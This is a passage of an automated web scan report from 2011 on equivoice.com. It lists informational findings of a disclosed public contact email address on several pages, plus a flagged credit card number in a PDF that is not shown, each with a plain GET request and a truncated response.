<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.30. http://www.equivoice.com/solutions/disaster_recovery.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/disaster_recovery.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/disaster_recovery.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:04:40 GMT
ETag: "108c4-3d16-46b9f67114600"
Accept-Ranges: bytes
Content-Length: 15638
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.31. http://www.equivoice.com/solutions/equi-t1.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/equi-t1.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/equi-t1.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:00 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:03:39 GMT
ETag: "108d5-27e8-46b9f636e7cc0"
Accept-Ranges: bytes
Content-Length: 10216
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.32. http://www.equivoice.com/solutions/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/index.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/index.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:39:59 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:02:16 GMT
ETag: "108d7-5544-46b9f5e7c0200"
Accept-Ranges: bytes
Content-Length: 21828
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.33. http://www.equivoice.com/solutions/managed_voip_solutions.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/managed_voip_solutions.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/managed_voip_solutions.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:00 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:01:37 GMT
ETag: "108d9-3b80-46b9f5c28ea40"
Accept-Ranges: bytes
Content-Length: 15232
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.34. http://www.equivoice.com/solutions/multi-site_business.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/multi-site_business.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/multi-site_business.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:02 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:01:15 GMT
ETag: "108da-59b5-46b9f5ad938c0"
Accept-Ranges: bytes
Content-Length: 22965
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

4.35. http://www.equivoice.com/solutions/single-site_business.htm  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /solutions/single-site_business.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/single-site_business.htm HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:01 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Fri, 05 Jun 2009 20:00:18 GMT
ETag: "108db-6ae6-46b9f57737880"
Accept-Ranges: bytes
Content-Length: 27366
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Equ
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...
<a href="mailto:info@equivoice.com">info@equivoice.com</a>
...[SNIP]...

5. Credit card numbers disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equivoice.com
Path:   /pdf/GetHostedNotToasted.pdf

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /pdf/GetHostedNotToasted.pdf HTTP/1.1
Host: www.equivoice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=172246071.1297352306.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=172246071.1173285237.1297352306.1297352306.1297352306.1; __utmc=172246071; __utmb=172246071.3.10.1297352306;

Response

HTTP/1.1 200 OK
Date: Thu, 10 Feb 2011 15:40:04 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 12 Aug 2008 14:30:39 GMT
ETag: "10862-1eeaf-454441da981c0"
Accept-Ranges: bytes
Content-Length: 126639
Connection: close
Content-Type: application/pdf

%PDF-1.4%....
179 0 obj <</Linearized 1/L 126639/O 183/E 65252/N 3/T 123011/H [ 832 259]>>endobj
xref
179 26
0000000016 00000 n
0000001268 00000 n
0000000832 00000 n
0000001561
...[SNIP]...
0 0 0 444 0 722 667 667 722 611 556 0 722 333 0 722 611 889 722 0 556 722 0 556 611 722 722 944 722 0 0 0 0 0 0 0 0 444 500 444 500 444 333 500 500 278 278 500 278 778 500 500 500 500 333 389 278 500 500 722 500 500 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 0 500 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 760]>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Thu Feb 10 09:58:40 CST 2011.